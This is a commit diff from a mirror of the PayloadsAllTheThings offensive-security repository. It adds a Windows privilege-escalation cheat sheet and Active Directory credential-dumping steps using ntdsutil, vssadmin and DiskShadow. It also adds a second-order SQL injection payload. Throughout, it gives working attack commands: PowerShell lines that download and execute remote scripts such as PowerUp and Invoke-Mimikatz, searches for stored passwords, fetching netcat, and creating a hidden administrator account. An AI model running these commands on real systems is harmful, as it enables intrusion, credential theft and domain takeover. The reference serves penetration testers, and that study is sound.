mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Windows PrivEsc + SQLi second order + AD DiskShadow
This commit is contained in:
parent
f1cb7ce50e
commit
e261836532
6 changed files with 215 additions and 17 deletions
|
@ -39,6 +39,7 @@ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met
|
||||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
|
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
|
||||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
||||||
```
|
```
|
||||||
|
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
|
||||||
|
|
||||||
## Most common paths to AD compromise
|
## Most common paths to AD compromise
|
||||||
|
|
||||||
|
@ -82,36 +83,59 @@ Get-NetGPOGroup
|
||||||
|
|
||||||
|
|
||||||
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
|
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
|
||||||
```c
|
**Using ndtsutil**
|
||||||
|
```powershell
|
||||||
C:\>ntdsutil
|
C:\>ntdsutil
|
||||||
ntdsutil: activate instance ntds
|
ntdsutil: activate instance ntds
|
||||||
ntdsutil: ifm
|
ntdsutil: ifm
|
||||||
ifm: create full c:\pentest
|
ifm: create full c:\pentest
|
||||||
ifm: quit
|
ifm: quit
|
||||||
ntdsutil: quit
|
ntdsutil: quit
|
||||||
|
```
|
||||||
|
|
||||||
or
|
**Using Vshadow**
|
||||||
|
```powershell
|
||||||
vssadmin create shadow /for=C :
|
vssadmin create shadow /for=C :
|
||||||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
||||||
```
|
```
|
||||||
|
|
||||||
|
**Using DiskShadow (a Windows signed binary)**
|
||||||
|
```powershell
|
||||||
|
diskshadow.txt contains :
|
||||||
|
set context persistent nowriters
|
||||||
|
add volume c: alias someAlias
|
||||||
|
create
|
||||||
|
expose %someAlias% z:
|
||||||
|
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
|
||||||
|
delete shadows volume %someAlias%
|
||||||
|
reset
|
||||||
|
|
||||||
|
then:
|
||||||
|
diskshadow.exe /s c:\diskshadow.txt
|
||||||
|
dir c:\exfil
|
||||||
|
reg.exe save hklm\system c:\exfil\system.bak
|
||||||
|
```
|
||||||
|
|
||||||
|
**Extract hashes from ntds.dit**
|
||||||
then you need to use secretsdump to extract the hashes
|
then you need to use secretsdump to extract the hashes
|
||||||
```c
|
```c
|
||||||
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
Metasploit module
|
**Alternatives - modules**
|
||||||
|
Metasploit modules
|
||||||
```c
|
```c
|
||||||
windows/gather/credentials/domain_hashdump
|
windows/gather/credentials/domain_hashdump
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
PowerSploit module
|
PowerSploit module
|
||||||
```
|
```
|
||||||
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
|
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Golden Tickets
|
### Golden Tickets
|
||||||
Forge a TGT, require krbtgt key
|
Forge a TGT, require krbtgt key
|
||||||
|
|
||||||
|
@ -268,3 +292,4 @@ net group "Domain Admins" hacker2 /add /domain
|
||||||
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
||||||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
||||||
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||||
|
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
157
Methodology and Resources/Windows - Privilege Escalation.md
Normal file
157
Methodology and Resources/Windows - Privilege Escalation.md
Normal file
|
@ -0,0 +1,157 @@
|
||||||
|
# Windows - Privilege Escalation
|
||||||
|
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
|
||||||
|
|
||||||
|
|
||||||
|
## Windows Version and Configuration
|
||||||
|
```powershell
|
||||||
|
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
||||||
|
```
|
||||||
|
|
||||||
|
Architecture
|
||||||
|
```powershell
|
||||||
|
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
List all env variables
|
||||||
|
```powershell
|
||||||
|
set
|
||||||
|
```
|
||||||
|
|
||||||
|
List all drives
|
||||||
|
```powershell
|
||||||
|
wmic logicaldisk get caption || fsutil fsinfo drives
|
||||||
|
```
|
||||||
|
|
||||||
|
## User Enumeration
|
||||||
|
|
||||||
|
Get current username
|
||||||
|
```powershell
|
||||||
|
echo %USERNAME% || whoami
|
||||||
|
```
|
||||||
|
|
||||||
|
List all users
|
||||||
|
```powershell
|
||||||
|
net user
|
||||||
|
whoami /all
|
||||||
|
```
|
||||||
|
|
||||||
|
List logon requirements; useable for bruteforcing
|
||||||
|
```powershell
|
||||||
|
net accounts
|
||||||
|
```
|
||||||
|
|
||||||
|
Get details about a user (i.e. administrator, admin, current user)
|
||||||
|
```powershell
|
||||||
|
net user administrator
|
||||||
|
net user admin
|
||||||
|
net user %USERNAME%
|
||||||
|
```
|
||||||
|
|
||||||
|
List all local groups
|
||||||
|
```powershell
|
||||||
|
net localgroup
|
||||||
|
```
|
||||||
|
|
||||||
|
Get details about a group (i.e. administrators)
|
||||||
|
```powershell
|
||||||
|
net localgroup administrators
|
||||||
|
```
|
||||||
|
|
||||||
|
## Network Enumeration
|
||||||
|
|
||||||
|
List all network interfaces
|
||||||
|
```powershell
|
||||||
|
ipconfig /all
|
||||||
|
```
|
||||||
|
|
||||||
|
List current routing table
|
||||||
|
```powershell
|
||||||
|
route print
|
||||||
|
```
|
||||||
|
|
||||||
|
List the ARP table
|
||||||
|
```powershell
|
||||||
|
arp -A
|
||||||
|
```
|
||||||
|
|
||||||
|
List all current connections
|
||||||
|
```powershell
|
||||||
|
netstat -ano
|
||||||
|
```
|
||||||
|
|
||||||
|
List firware state and current configuration
|
||||||
|
```powershell
|
||||||
|
netsh advfirewall firewall dump
|
||||||
|
```
|
||||||
|
|
||||||
|
List all network shares
|
||||||
|
```powershell
|
||||||
|
net share
|
||||||
|
```
|
||||||
|
|
||||||
|
## Looting for passwords
|
||||||
|
|
||||||
|
Search for file contents
|
||||||
|
```powershell
|
||||||
|
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
Search for a file with a certain filename
|
||||||
|
```powershell
|
||||||
|
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||||||
|
```
|
||||||
|
|
||||||
|
Search the registry for key names
|
||||||
|
```powershell
|
||||||
|
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||||||
|
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||||
|
```
|
||||||
|
|
||||||
|
Read a value of a certain sub key
|
||||||
|
```powershell
|
||||||
|
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||||
|
```
|
||||||
|
|
||||||
|
## Processes Enum
|
||||||
|
What processes are running?
|
||||||
|
```powershell
|
||||||
|
tasklist /v
|
||||||
|
```
|
||||||
|
|
||||||
|
Which processes are running as "system"
|
||||||
|
```powershell
|
||||||
|
tasklist /v /fi "username eq system"
|
||||||
|
```
|
||||||
|
|
||||||
|
Do you have powershell magic?
|
||||||
|
```powershell
|
||||||
|
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Uploading / Downloading files
|
||||||
|
a wget using powershell
|
||||||
|
```powershell
|
||||||
|
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
wget using bitsadmin (when powershell is not present)
|
||||||
|
```powershell
|
||||||
|
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
|
||||||
|
```powershell
|
||||||
|
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
## Spot the weak service using PowerSploit's PowerUP
|
||||||
|
```powershell
|
||||||
|
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||||||
|
```
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||||
|
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||||
|
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
|
@ -1,9 +1,14 @@
|
||||||
# Windows - Using credentials
|
# Windows - Using credentials
|
||||||
Little tip, if you don't have credentials yet :D
|
Little tip, if you don't have credentials yet :D
|
||||||
```
|
```powershell
|
||||||
net user hacker hacker /add
|
net user hacker hacker /add
|
||||||
net localgroup administrators hacker /add
|
net localgroup administrators hacker /add
|
||||||
```
|
```
|
||||||
|
Some info about your user
|
||||||
|
```powershell
|
||||||
|
net user /dom
|
||||||
|
net user /domain
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Metasploit - SMB
|
## Metasploit - SMB
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# POSTGRESQL
|
# POSTGRESQL
|
||||||
|
|
||||||
## PostgreSQL Comment
|
## PostgreSQL Comments
|
||||||
```
|
```
|
||||||
--
|
--
|
||||||
/**/
|
/**/
|
||||||
|
|
|
@ -2,13 +2,19 @@
|
||||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
* [Entry point detection](#)
|
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
|
||||||
* [DBMS Identification](#)
|
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
|
||||||
* [SQL injection using SQLmap](#)
|
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
|
||||||
* [Authentication bypass](#)
|
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
|
||||||
* [Polyglot injection](#)
|
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
|
||||||
* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
|
* [Entry point detection](#entry-point-detection)
|
||||||
* [WAF Bypass](#)
|
* [DBMS Identification](#dbms-identification)
|
||||||
|
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
||||||
|
* [Authentication bypass](#authentication-bypass)
|
||||||
|
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||||
|
* [Second order injection](#second-order-injection)
|
||||||
|
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
|
||||||
|
* [WAF Bypass](#waf-bypass)
|
||||||
|
|
||||||
|
|
||||||
## Entry point detection
|
## Entry point detection
|
||||||
|
@ -275,6 +281,11 @@ admin") or "1"="1"/*
|
||||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Second order injection
|
||||||
|
```sql
|
||||||
|
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
|
||||||
|
```
|
||||||
|
|
||||||
## Insert Statement - ON DUPLICATE KEY UPDATE
|
## Insert Statement - ON DUPLICATE KEY UPDATE
|
||||||
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
||||||
```sql
|
```sql
|
||||||
|
@ -392,7 +403,7 @@ mysql> mysql> select version();
|
||||||
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||||
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
|
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
|
||||||
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
|
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
|
||||||
* MSQQL:
|
* MSSQL:
|
||||||
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
||||||
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||||
* ORACLE:
|
* ORACLE:
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# SQLite Injection
|
# SQLite Injection
|
||||||
|
|
||||||
## SQLite comment
|
## SQLite comments
|
||||||
```sql
|
```sql
|
||||||
--
|
--
|
||||||
/**/
|
/**/
|
||||||
|
|
Loading…
Reference in a new issue